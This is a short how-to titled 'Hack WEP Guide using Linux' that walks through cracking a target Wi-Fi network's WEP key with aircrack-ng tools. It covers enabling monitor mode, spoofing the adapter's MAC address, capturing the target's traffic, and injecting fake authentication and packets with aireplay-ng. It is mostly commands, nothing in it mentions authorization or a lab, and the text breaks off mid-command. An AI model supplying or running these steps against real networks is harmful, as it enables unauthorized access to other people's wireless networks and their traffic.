Hack WEP Guide using Linux
iwconfig (stop the adapter by issuing) airmon-ng stop ath0 airmon-ng start wifi0 ( monitor mode enabled) ifconfig ath0 down macchanger --mac 11:11:11:11:11:11 ath0 ifconfig ath0 up airodump-ng ath0 ( now you must choose target , use ctrl+c to stop scanning ) (open new shell window or session) (Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:) (the command below will output to the file WEP123 airodump-ng -c [NUMBERofCHANNEL] -w WEP123 --bssid [BSSID] ath0 (open new shell window or session) (Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:) aireplay-ng -1 0 -a [bssid] -h 11:11:11:11:11:11 -e [ESSID] ath0 (open new shell window or session) (If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:) aireplay-ng...